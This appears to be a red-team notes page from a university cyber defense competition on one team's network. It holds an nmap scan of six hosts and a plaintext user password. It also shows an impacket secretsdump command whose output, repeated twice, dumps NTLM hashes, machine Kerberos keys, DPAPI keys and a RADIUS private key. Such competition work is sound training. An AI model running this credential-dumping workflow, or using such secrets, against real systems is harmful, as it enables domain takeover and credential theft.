Team Information
- Number
- Team 4
- Name
- CDC TEAM 4!!!! :D
- IP Range
- 200.2.96.0/24
- Domain
- team4.isucdc.com
- Current Place
- 4th
- Red Teamer(s)
- None
Service Status
| AD LDAP |
| AD RDP |
| JD RDP |
| LTV SSH |
| NEWS SSH |
| NEWS HTTP |
| WSTN SSH |
| WSTN MQTT |
| WWW SSH |
| WWW HTTP |
Nmap
Uploaded Files:
TEAM4
# Nmap 7.93 scan initiated Sat Oct 4 10:04:13 2025 as: "C:\\Program Files (x86)\\Nmap\\nmap.exe" -A -sV -p- -iL "C:\\Users\\Benjamin Merz\\Documents\\ISUCDC_hostname_list4.txt" -o "C:\\users\\Benjamin Merz\\Documents\\Team4"Nmap scan report for ad.team4.isucdc.com (200.2.96.10)
Host is up (0.0029s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team4.isucdc.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=ad.team4.isucdc.com
| Subject Alternative Name: DNS:ad.team4.isucdc.com
| Not valid before: 2025-09-29T18:22:08
|_Not valid after: 2026-09-29T18:32:07
|_ssl-date: 2025-10-04T15:09:32+00:00; -2s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TEAM4
| NetBIOS_Domain_Name: TEAM4
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: team4.isucdc.com
| DNS_Computer_Name: ad.team4.isucdc.com
| DNS_Tree_Name: team4.isucdc.com
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-04T15:09:27+00:00
|_ssl-date: 2025-10-04T15:09:32+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ad.team4.isucdc.com
| Not valid before: 2025-09-05T01:19:41
|_Not valid after: 2026-03-07T01:19:41
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 2.00 ms 200.2.96.10
Nmap scan report for jd.team4.isucdc.com (200.2.96.20)
Host is up (0.0024s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3389/tcp open ssl/ms-wbt-server?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 2.00 ms 200.2.96.20
Nmap scan report for ltv.team4.isucdc.com (200.2.96.30)
Host is up (0.0036s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 0c7c02eb5a9fe29566c11e06cf84cf47 (DSA)
| 2048 453739b58fc6b978ab1e41dd81596ecf (RSA)
| 256 89e9f14ac8d9391f078dd4603c19c4dd (ECDSA)
|_ 256 58de7185954051643b9ee99cebfdf838 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (90%), Linksys embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:4.1 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 3.2 - 4.9 (90%), Linux 3.16 (88%), Linksys EA3500 WAP (88%), Linux 3.13 (88%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (85%), Linux 2.6.32 (85%), Linux 3.16 - 4.6 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 3.00 ms 200.2.96.30
Nmap scan report for news.team4.isucdc.com (200.2.96.40)
Host is up (0.0031s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 357994a98dd506f35bb6c7317962de08 (RSA)
| 256 95a6a90f800410e48ba00b686b3907e8 (ECDSA)
|_ 256 9578e1eedc0ef62ba30dddaae08fa7cd (ED25519)
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Disposition: inline;filename=f.txt
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:08:26 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:08:26.451+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:08:26 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:08:26.314+00:00","status":404,"error":"Not Found","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:08:26 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:08:26.344+00:00","status":404,"error":"Not Found","path":"/"}
| RTSPRequest, Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sat, 04 Oct 2025 15:08:26 GMT
| Connection: close
| HTTP Status 400
| Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}
HTTP Status 400
|_ Request
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=10/4%Time=68E1386A%P=i686-pc-windows-windows%
SF:r(GetRequest,11B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20A
SF:ccess-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers
SF:\r\nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2004\x20Oct\x20
SF:2025\x2015:08:26\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\
SF:"2025-10-04T15:08:26\.314\+00:00\",\"status\":404,\"error\":\"Not\x20Fo
SF:und\",\"path\":\"/\"}")%r(HTTPOptions,11B,"HTTP/1\.1\x20404\x20\r\nVary
SF::\x20Origin\r\nVary:\x20Access-Control-Request-Method\r\nVary:\x20Acces
SF:s-Control-Request-Headers\r\nContent-Type:\x20application/json\r\nDate:
SF:\x20Sat,\x2004\x20Oct\x202025\x2015:08:26\x20GMT\r\nConnection:\x20clos
SF:e\r\n\r\n{\"timestamp\":\"2025-10-04T15:08:26\.344\+00:00\",\"status\":
SF:404,\"error\":\"Not\x20Found\",\"path\":\"/\"}")%r(RTSPRequest,24E,"HTT
SF:P/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nConten
SF:t-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Sat,\x2004\x20O
SF:ct\x202025\x2015:08:26\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:x20html>HTTP\x20Status\x20400\x20\xe2
SF:\x80\x93\x20Bad\x20Requestbody\x20{
SF:font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{col
SF:or:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x2
SF:0{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}
SF:\x20a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D
SF:76;border:none;}
HTTP\x20Status\x20400\x20\xe2\
SF:x80\x93\x20Bad\x20Request")%r(FourOhFourRequest,16A,
SF:"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-Control-Req
SF:uest-Method\r\nVary:\x20Access-Control-Request-Headers\r\nContent-Dispo
SF:sition:\x20inline;filename=f\.txt\r\nContent-Type:\x20application/json\
SF:r\nDate:\x20Sat,\x2004\x20Oct\x202025\x2015:08:26\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n{\"timestamp\":\"2025-10-04T15:08:26\.451\+00:00\",\"s
SF:tatus\":404,\"error\":\"Not\x20Found\",\"path\":\"/nice%20ports%2C/Tri%
SF:6Eity\.txt%2ebak\"}")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\r\nContent-Typ
SF:e:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Len
SF:gth:\x20435\r\nDate:\x20Sat,\x2004\x20Oct\x202025\x2015:08:26\x20GMT\r\
SF:nConnection:\x20close\r\n\r\n
SF:ad>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request
SF:e>body\x20{font-family:Tahoma,Arial,sans-se
SF:rif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D7
SF:6;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{fon
SF:t-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.lin
SF:e\x20{height:1px;background-color:#525D76;border:none;}<
SF:body>
HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request
SF:body>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.3 (89%), Linux 5.0 - 5.4 (86%), Linux 5.4 (85%), Linux 2.6.32 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 3.00 ms 200.2.96.40
Nmap scan report for wstn.team4.isucdc.com (200.2.96.50)
Host is up (0.0024s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a185df5ed7864cc5387404bb610863a (RSA)
| 256 e474126041a3534067eeeadac542e3fd (ECDSA)
|_ 256 0799db383afe5abafc5c27c9ea83c3c5 (ED25519)
1883/tcp closed mqtt
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 4.15 - 5.6 (91%), Linux 5.0 - 5.3 (90%), Linux 5.0 - 5.4 (88%), Linux 2.6.32 (87%), Linux 3.2 - 4.9 (87%), Linux 5.4 (86%), Linux 2.6.32 - 3.10 (86%), Linux 5.3 - 5.4 (86%), Linux 3.4 - 3.10 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 6.00 ms 200.2.96.50
Nmap scan report for www.team4.isucdc.com (200.2.96.60)
Host is up (0.0025s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a06a89c7a4b137232d3aa124c3761006 (ECDSA)
|_ 256 a87c353ddf2b92072b1ec85a8dd37e0f (ED25519)
80/tcp open http OpenResty web app server
|_http-title: Arrow pointing to the left
|_http-server-header: openresty
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.3 (89%), Linux 5.0 - 5.4 (86%), Linux 5.4 (85%), Linux 2.6.32 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 6.00 ms 200.2.96.60
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 4 10:13:34 2025 -- 6 IP addresses (6 hosts up) scanned in 560.89 seconds
CURRENT tina.bell PASSWORD: teh012jig
CURRENT tina.bell PASSWORD: teh012jig
mpacket-secretsdump -use-vss TEAM4/tina.bell:teh012jig@127.0.0.1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM4\AD$:aes256-cts-hmac-sha1-96:94a752fd8695223326b6020a534ae9e2a307c17a8bda2809fc283c3121992455
TEAM4\AD$:aes128-cts-hmac-sha1-96:70beed01c6fa2f38bf7d14e142399a27
TEAM4\AD$:des-cbc-md5:1c2fb58ad997bc5e
TEAM4\AD$:plain_password_hex:0dc0ab08cda76b18e08821c6849cea2ae49774204eba2d2eae03a9554ef116fcd1aec04924443c4f576be8f49e64aded803ca3d2db6ec00eabce46d7e72789a956c7414e5d5c93829c1615495d99319d253bd520cc3a848b317aa6a9c9fe468624398e4faaf1bc8069274076a0871f6c1434c8e24a216fc24ba9cfc214fd25a8840c8caa3a1398d7478f165c4c26b26b1a891d450a2090668269b48effeb0063013f705acc658537d54172c46a747f94dbb4f6a6e70a34bed7880e87a34107eb508f3da95d5c72534460bda9faf68950a27708fa2b45cf05f4af16c71c1870beb6953e5966bd258358ef47f932c1c9fa
TEAM4\AD$:aad3b435b51404eeaad3b435b51404ee:3d1de2d89312133db21df62d57a31c93:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY
0000 BC CF D3 A8 51 63 0E 5C 7B 10 26 87 DF 66 09 40 ....Qc.\{.&..f.@
0010 96 0B B5 BD FE 34 CA 80 A8 DC C9 B5 48 A6 61 F4 .....4......H.a.
0020 7A 8A 83 37 4E E6 E1 5F 6E EB B6 DC 3A 86 59 76 z..7N.._n...:.Yv
0030 CD 4C 47 B8 9E 98 FC 6C 3C FE 33 54 EE 37 51 73 .LG....l<.3T.7Qs
0040 0A 66 36 4A CF 46 65 62 BF 4C C1 F7 CF 9A F8 97 .f6J.Feb.L......
0050 36 9D 0D 0B BC 24 C9 5C 66 37 49 C3 7A 3D F1 AD 6....$.\f7I.z=..
0060 AA B6 92 B3 E1 FF 08 7A 78 70 8F CB 31 F9 F1 A4 .......zxp..1...
0070 86 5B 0C 5B E8 8E 2B F6 13 2F 4C 1C 1B 71 AA 39 .[.[..+../L..q.9
0080 10 82 C7 EF AC 0E F8 C4 FE 24 BC 4C 6C 94 B4 6D .........$.Ll..m
0090 AC 89 D9 9E 13 59 E8 FF A4 EC AA 46 4A A6 80 09 .....Y.....FJ...
00a0 4A 3E 91 01 D5 75 5C 2D 7D 3D 3B 50 65 41 1C 4B J>...u\-}=;PeA.K
00b0 73 5B 1C 94 50 4C 79 AE D6 B2 FC 61 56 31 3D 74 s[..PLy....aV1=t
00c0 53 46 EA 11 31 16 35 F1 5E 2A 6B 00 DB A7 D0 31 SF..1.5.^*k....1
00d0 5A 88 F6 79 64 41 5A 58 1B 4D D7 9B 19 1D 35 79 Z..ydAZX.M....5y
00e0 F4 76 5C 62 86 72 1F 52 34 B0 4E E2 A1 85 32 F4 .v\b.r.R4.N...2.
00f0 A5 AC 25 8C 22 60 E1 43 9C 4D BE 9B 02 AC A7 0A ..%."`.C.M......
G$MSRADIUSPRIVKEY:bccfd3a851630e5c7b102687df660940960bb5bdfe34ca80a8dcc9b548a661f47a8a83374ee6e15f6eebb6dc3a865976cd4c47b89e98fc6c3cfe3354ee3751730a66364acf466562bf4cc1f7cf9af897369d0d0bbc24c95c663749c37a3df1adaab692b3e1ff087a78708fcb31f9f1a4865b0c5be88e2bf6132f4c1c1b71aa391082c7efac0ef8c4fe24bc4c6c94b46dac89d99e1359e8ffa4ecaa464aa680094a3e9101d5755c2d7d3d3b5065411c4b735b1c94504c79aed6b2fc6156313d745346ea11311635f15e2a6b00dba7d0315a88f67964415a581b4dd79b191d3579f4765c6286721f5234b04ee2a18532f4a5ac258c2260e1439c4dbe9b02aca70a
[*] NL$KM
0000 CB 29 1A AF 7D BF E8 20 69 E8 D9 9E 40 DB 0D 6D .)..}.. i...@..m
0010 7D C2 53 C4 DF 55 27 23 E8 DF 5A A9 91 37 9E 38 }.S..U'#..Z..7.8
0020 4B E2 7D B6 92 89 11 38 93 D5 08 B1 93 A3 3B EF K.}....8......;.
0030 8C 80 6B 25 D5 4B FE 41 1B 43 3C 43 AF 93 70 A2 ..k%.K.A.CNL$KM:cb291aaf7dbfe82069e8d99e40db0d6d7dc253c4df552723e8df5aa991379e384be27db69289113893d508b193a33bef8c806b25d54bfe411b433c43af9370a2
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using smbexec method for remote execution
[-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM4\AD$:aes256-cts-hmac-sha1-96:94a752fd8695223326b6020a534ae9e2a307c17a8bda2809fc283c3121992455
TEAM4\AD$:aes128-cts-hmac-sha1-96:70beed01c6fa2f38bf7d14e142399a27
TEAM4\AD$:des-cbc-md5:1c2fb58ad997bc5e
TEAM4\AD$:plain_password_hex:0dc0ab08cda76b18e08821c6849cea2ae49774204eba2d2eae03a9554ef116fcd1aec04924443c4f576be8f49e64aded803ca3d2db6ec00eabce46d7e72789a956c7414e5d5c93829c1615495d99319d253bd520cc3a848b317aa6a9c9fe468624398e4faaf1bc8069274076a0871f6c1434c8e24a216fc24ba9cfc214fd25a8840c8caa3a1398d7478f165c4c26b26b1a891d450a2090668269b48effeb0063013f705acc658537d54172c46a747f94dbb4f6a6e70a34bed7880e87a34107eb508f3da95d5c72534460bda9faf68950a27708fa2b45cf05f4af16c71c1870beb6953e5966bd258358ef47f932c1c9fa
TEAM4\AD$:aad3b435b51404eeaad3b435b51404ee:3d1de2d89312133db21df62d57a31c93:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY
0000 BC CF D3 A8 51 63 0E 5C 7B 10 26 87 DF 66 09 40 ....Qc.\{.&..f.@
0010 96 0B B5 BD FE 34 CA 80 A8 DC C9 B5 48 A6 61 F4 .....4......H.a.
0020 7A 8A 83 37 4E E6 E1 5F 6E EB B6 DC 3A 86 59 76 z..7N.._n...:.Yv
0030 CD 4C 47 B8 9E 98 FC 6C 3C FE 33 54 EE 37 51 73 .LG....l<.3T.7Qs
0040 0A 66 36 4A CF 46 65 62 BF 4C C1 F7 CF 9A F8 97 .f6J.Feb.L......
0050 36 9D 0D 0B BC 24 C9 5C 66 37 49 C3 7A 3D F1 AD 6....$.\f7I.z=..
0060 AA B6 92 B3 E1 FF 08 7A 78 70 8F CB 31 F9 F1 A4 .......zxp..1...
0070 86 5B 0C 5B E8 8E 2B F6 13 2F 4C 1C 1B 71 AA 39 .[.[..+../L..q.9
0080 10 82 C7 EF AC 0E F8 C4 FE 24 BC 4C 6C 94 B4 6D .........$.Ll..m
0090 AC 89 D9 9E 13 59 E8 FF A4 EC AA 46 4A A6 80 09 .....Y.....FJ...
00a0 4A 3E 91 01 D5 75 5C 2D 7D 3D 3B 50 65 41 1C 4B J>...u\-}=;PeA.K
00b0 73 5B 1C 94 50 4C 79 AE D6 B2 FC 61 56 31 3D 74 s[..PLy....aV1=t
00c0 53 46 EA 11 31 16 35 F1 5E 2A 6B 00 DB A7 D0 31 SF..1.5.^*k....1
00d0 5A 88 F6 79 64 41 5A 58 1B 4D D7 9B 19 1D 35 79 Z..ydAZX.M....5y
00e0 F4 76 5C 62 86 72 1F 52 34 B0 4E E2 A1 85 32 F4 .v\b.r.R4.N...2.
00f0 A5 AC 25 8C 22 60 E1 43 9C 4D BE 9B 02 AC A7 0A ..%."`.C.M......
G$MSRADIUSPRIVKEY:bccfd3a851630e5c7b102687df660940960bb5bdfe34ca80a8dcc9b548a661f47a8a83374ee6e15f6eebb6dc3a865976cd4c47b89e98fc6c3cfe3354ee3751730a66364acf466562bf4cc1f7cf9af897369d0d0bbc24c95c663749c37a3df1adaab692b3e1ff087a78708fcb31f9f1a4865b0c5be88e2bf6132f4c1c1b71aa391082c7efac0ef8c4fe24bc4c6c94b46dac89d99e1359e8ffa4ecaa464aa680094a3e9101d5755c2d7d3d3b5065411c4b735b1c94504c79aed6b2fc6156313d745346ea11311635f15e2a6b00dba7d0315a88f67964415a581b4dd79b191d3579f4765c6286721f5234b04ee2a18532f4a5ac258c2260e1439c4dbe9b02aca70a
[*] NL$KM
0000 CB 29 1A AF 7D BF E8 20 69 E8 D9 9E 40 DB 0D 6D .)..}.. i...@..m
0010 7D C2 53 C4 DF 55 27 23 E8 DF 5A A9 91 37 9E 38 }.S..U'#..Z..7.8
0020 4B E2 7D B6 92 89 11 38 93 D5 08 B1 93 A3 3B EF K.}....8......;.
0030 8C 80 6B 25 D5 4B FE 41 1B 43 3C 43 AF 93 70 A2 ..k%.K.A.CNL$KM:cb291aaf7dbfe82069e8d99e40db0d6d7dc253c4df552723e8df5aa991379e384be27db69289113893d508b193a33bef8c806b25d54bfe411b433c43af9370a2
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using smbexec method for remote execution
[-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Notable Vulnerabilities
Add content here...
Notable Defenses
Add content here...
Team Spirit Issues
Add content here...